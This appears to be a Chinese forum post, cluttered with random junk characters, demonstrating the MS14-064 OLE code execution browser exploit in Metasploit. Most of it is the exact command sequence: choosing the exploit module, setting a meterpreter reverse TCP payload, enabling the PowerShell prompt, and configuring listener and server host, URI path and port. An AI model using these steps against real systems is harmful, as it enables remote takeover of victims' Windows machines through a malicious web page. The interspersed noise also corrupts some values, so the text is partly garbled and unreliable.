, K1 l+ G Z# |6 \8 A 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示4 A& R2 H2 P; @% O% P9 S5 \
) Y+ F8 h0 a7 [. T* b: Y/ _0 `" O
) n9 M; ~# |3 j
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: * C+ h" v; m! e; G8 s) l0 E0 p
7 I- a3 r& h8 @ H4 N
6 s* D- G) W- k9 d% o J4 n3 f 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp$ h) t- V4 P5 G5 g1 P( T
* }1 E2 M B5 l& V7 N2 G
- A5 ~) H/ p. @: o& @3 U1 I9 @$ |
set AllowPowershellPrompt true
" i `" u; E0 b' S2 \) P- c
' X3 Y% r6 `( o( Q6 |
7 O! j* R1 O+ D( B* X4 k+ H Set LHOST 192.168.0.109
# `# U" F# g' r9 z, l+ k/ s
+ g) X/ `3 k2 P4 w# r/ Y
5 a0 d% s# n6 Y+ `% O
set SRVHOST 192.168.0.1091 I2 |8 o; A1 e6 x! j, Y
8 R* {7 `8 H% ^" a4 Y; U' L. f
3 C6 e: Z3 [; E, q Set uripath share0 j+ E% W6 p: F1 y) I: U% {* Z
K1 `8 t: o& r8 p! c& k
E$ W T# w- G3 v, Z Set srvport 805 n$ _ I# b1 E: u8 B
9 D3 P: ]+ E) i$ N7 f$ ?( \
( j1 X0 L* O# z% Z1 ^1 e * U$ O8 f4 v# ^. Q1 U- @
/ l+ z( v% `! ~9 v
) l. Y+ R; L+ e# {8 _) M
: _3 Q& a6 ^; b) u
% N# I1 E/ G0 A, M8 G" r
G D( z, k# Q9 |; s' W& ]
3 z; A$ S# ?1 ~
1 G4 u6 [* K; e- P1 t9 E8 A5 J. c, h
/ B2 Z! a, K4 Q" @
# W8 {0 i" L! W" s6 f; {
$ O) E, D f3 C7 O% z8 i
, e( [, D7 h* r% B- P! L/ ^
$ W! c$ L& D) \9 v
2 ?9 }! N' }8 r8 j7 e W- [ 下面我们来访问本地地址如图:* l& m# J% o) K& I
) C: S8 j4 X0 s( L' n& d
3 ?) |: S% w) h5 H* U + a5 t7 H% @; N( `3 P
# |4 V" o4 T0 ^" H) a$ p. t; p0 j1 `0 G* K7 F# P# H
" C ?' m8 G8 Q2 [( v$ H
& x# @: J" ^- r, T5 \# s3 Y
0 E6 _+ t2 ?- E6 [' _& D, Q# c" g7 a$ s
; `+ k4 a5 m$ H& y |0 }